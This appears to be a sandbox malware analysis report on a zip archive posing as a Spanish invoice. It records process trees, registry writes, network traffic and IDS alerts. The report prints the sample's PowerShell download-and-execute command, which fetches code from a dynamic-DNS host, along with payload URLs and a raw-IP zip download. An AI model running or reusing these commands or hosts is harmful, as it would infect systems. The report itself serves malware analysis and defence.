| File name: | Se adjunta factura Nº - O6v0V8F5D3Y2R2805.zip |
| Full analysis: | https://app.any.run/tasks/1b13e083-3c7b-45d0-affb-66599dd5f9f3 |
| Verdict: | Malicious activity |
| Analysis date: | May 10, 2024, 19:51:33 |
| OS: | Windows 11 Professional (build: 22000, 64 bit) |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v2.0 to extract, compression method=deflate |
| MD5: | 54DA5A3E184E598FD9A330281BDBD47C |
| SHA1: | D5E8327B838344B5BD752A0ABF9C2BCDE4F57AE0 |
| SHA256: | 04F8A053EF21E894A1E5CDC1A0B37C393D0C104F89CB3ED9EE43755B7F03E287 |
| SSDEEP: | 48:9y8qkFAvMvmTnquDBd3qhTgapVTtbioErc31y9Sw6P4a8i5:55FAvMeTqgBd3qhTga3Yc31+Sw6SA |
| .zip | | | ZIP compressed archive (100) |
|---|
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | 0x0800 |
| ZipCompression: | Deflated |
| ZipModifyDate: | 2024:05:10 12:40:46 |
| ZipCRC: | 0x69c710d7 |
| ZipCompressedSize: | 1388 |
| ZipUncompressedSize: | 6774 |
| ZipFileName: | Se adjunta factura N? - O6v0V8F5D3Y2R2805.html |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 536 | powershell.exe -nop -win 1 - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.22000.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 748 | "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6596 -childID 12 -isForBrowser -prefsHandle 6700 -prefMapHandle 6704 -prefsLen 28202 -prefMapSize 242999 -jsInitHandle 1344 -jsInitLen 235124 -parentBuildID 20240213221259 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4f9316a-a299-4436-b5c1-ba42ba3441e8} 6348 "\\.\pipe\gecko-crash-server-pipe.6348" 21d76bbb150 tab | C:\Program Files\Mozilla Firefox\firefox.exe | — | firefox.exe | |||||||||||
User: admin Company: Mozilla Corporation Integrity Level: LOW Description: Firefox Exit code: 0 Version: 123.0 Modules
| |||||||||||||||
| 948 | C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('http://tyahw.3utilities.com/ldvb/pw') " | C:\Windows\SysWOW64\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.22000.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 988 | C:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 700 | C:\Windows\SysWOW64\WerFault.exe | _tnuwpr9_Ni7.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Problem Reporting Exit code: 0 Version: 10.0.22000.653 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1064 | "C:\_tnuwpr9_N\_tnuwpr9_Ni7.exe" | C:\_tnuwpr9_N\_tnuwpr9_Ni7.exe | explorer.exe | ||||||||||||
User: admin Company: Oracle Corporation Integrity Level: MEDIUM Description: Java(TM) Platform SE binary Exit code: 3221225477 Version: 8.0.920.14 Modules
| |||||||||||||||
| 1076 | "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6924 -childID 13 -isForBrowser -prefsHandle 6784 -prefMapHandle 5616 -prefsLen 28202 -prefMapSize 242999 -jsInitHandle 1344 -jsInitLen 235124 -parentBuildID 20240213221259 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6aa0bfb2-feca-4b58-816e-86d1d160e005} 6348 "\\.\pipe\gecko-crash-server-pipe.6348" 21d76bbb310 tab | C:\Program Files\Mozilla Firefox\firefox.exe | — | firefox.exe | |||||||||||
User: admin Company: Mozilla Corporation Integrity Level: LOW Description: Firefox Exit code: 0 Version: 123.0 Modules
| |||||||||||||||
| 1352 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Downloads\Factura-ZRAKG.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | OpenWith.exe | |||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 1073807364 Version: 5.91.0 Modules
| |||||||||||||||
| 1420 | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,11249738196056524982,8773611683334439535,262144 --variations-seed-version --mojo-platform-channel-handle=3180 /prefetch:1 | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | — | chrome.exe | |||||||||||
User: admin Company: Google LLC Integrity Level: LOW Description: Google Chrome Exit code: 0 Version: 123.0.6312.86 Modules
| |||||||||||||||
| 1544 | "C:\Windows\System32\cmd.exe" /c C:\Users\Public\e.cmd | C:\Windows\SysWOW64\cmd.exe | — | mshta.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 10.0.22000.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1588 | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --no-appcompat-clear --field-trial-handle=2100,i,11249738196056524982,8773611683334439535,262144 --variations-seed-version --mojo-platform-channel-handle=2136 /prefetch:3 | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | chrome.exe | ||||||||||||
User: admin Company: Google LLC Integrity Level: MEDIUM Description: Google Chrome Exit code: 0 Version: 123.0.6312.86 Modules
| |||||||||||||||
| (PID) Process: | (6080) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\General |
| Operation: | write | Name: | VerInfo |
Value: 005B0500FA5ED87E13A3DA01 | |||
| (PID) Process: | (6080) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (6080) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (6080) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\Downloads\Se adjunta factura Nº - O6v0V8F5D3Y2R2805.zip | |||
| (PID) Process: | (6080) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (6080) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (6080) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (6080) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (6080) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithProgids |
| Operation: | write | Name: | MSEdgeHTM |
Value: | |||
| (PID) Process: | (2488) OpenWith.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithProgids |
| Operation: | write | Name: | MSEdgeHTM |
Value: | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6056 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-663E7AE6-17A8.pma | — | |
MD5:— | SHA256:— | |||
| 6056 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State | — | |
MD5:— | SHA256:— | |||
| 6056 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\discounts_db\LOG.old | — | |
MD5:— | SHA256:— | |||
| 6056 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old | — | |
MD5:— | SHA256:— | |||
| 6056 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old~RF10e83f.TMP | — | |
MD5:— | SHA256:— | |||
| 6056 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old | — | |
MD5:— | SHA256:— | |||
| 6056 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db\LOG.old | — | |
MD5:— | SHA256:— | |||
| 6056 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG.old~RF10e83f.TMP | — | |
MD5:— | SHA256:— | |||
| 6056 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\LOG.old | — | |
MD5:— | SHA256:— | |||
| 6056 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old | — | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1088 | svchost.exe | POST | 302 | 184.28.89.167:80 | http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 | unknown | — | — | unknown |
2868 | OfficeClickToRun.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D | unknown | — | — | unknown |
1088 | svchost.exe | POST | 302 | 184.28.89.167:80 | http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 | unknown | — | — | unknown |
1088 | svchost.exe | POST | 302 | 184.28.89.167:80 | http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 | unknown | — | — | unknown |
1088 | svchost.exe | POST | 302 | 184.28.89.167:80 | http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 | unknown | — | — | unknown |
1588 | chrome.exe | GET | 200 | 34.104.35.123:80 | http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx | unknown | — | — | unknown |
7048 | mshta.exe | GET | 200 | 93.127.215.82:80 | http://tyahw.3utilities.com/ldvb/0105 | unknown | — | — | unknown |
6756 | powershell.exe | GET | 200 | 93.127.215.82:80 | http://tyahw.3utilities.com/ldvb/pw | unknown | — | — | unknown |
6756 | powershell.exe | GET | 200 | 51.20.73.61:80 | http://51.20.73.61/m5.zip | unknown | — | — | unknown |
2828 | svchost.exe | GET | 200 | 199.232.214.172:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?4d03a57f1cd14d0c | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 239.255.255.250:1900 | — | — | — | unknown |
2844 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
2844 | svchost.exe | 20.42.73.31:443 | v10.events.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
1088 | svchost.exe | 184.28.89.167:80 | go.microsoft.com | AKAMAI-AS | US | unknown |
2868 | OfficeClickToRun.exe | 20.42.72.131:443 | self.events.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
2868 | OfficeClickToRun.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
— | — | 66.102.1.84:443 | accounts.google.com | GOOGLE | US | unknown |
— | — | 216.58.206.35:443 | clientservices.googleapis.com | GOOGLE | US | unknown |
— | — | 142.250.181.238:443 | clients2.google.com | GOOGLE | US | unknown |
Domain | IP | Reputation |
|---|---|---|
v10.events.data.microsoft.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
clientservices.googleapis.com |
| whitelisted |
accounts.google.com |
| shared |
clients2.google.com |
| whitelisted |
firebasestorage.googleapis.com |
| whitelisted |
edgedl.me.gvt1.com |
| whitelisted |
www.google.com |
| whitelisted |
zacmn.tech |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
— | — | Misc activity | ET INFO Microsoft Connection Test |
1588 | chrome.exe | Not Suspicious Traffic | INFO [ANY.RUN] Attempting to connect to TLS FireBase Storage |
1588 | chrome.exe | Not Suspicious Traffic | INFO [ANY.RUN] Attempting to connect to TLS FireBase Storage |
1588 | chrome.exe | Potential Corporate Privacy Violation | ET POLICY Dropbox.com Offsite File Backup in Use |
— | — | Potentially Bad Traffic | ET POLICY DNS Query to DynDNS Domain *.3utilities .com |
7048 | mshta.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS HTTP Request to a *.3utilities .com Domain |
7048 | mshta.exe | A Network Trojan was detected | SUSPICIOUS [ANY.RUN] VBS is used to run Shell |
6756 | powershell.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS HTTP Request to a *.3utilities .com Domain |
6756 | powershell.exe | Potentially Bad Traffic | ET HUNTING Terse Request for Zip File (GET) |
6756 | powershell.exe | Potentially Bad Traffic | ET INFO Dotted Quad Host ZIP Request |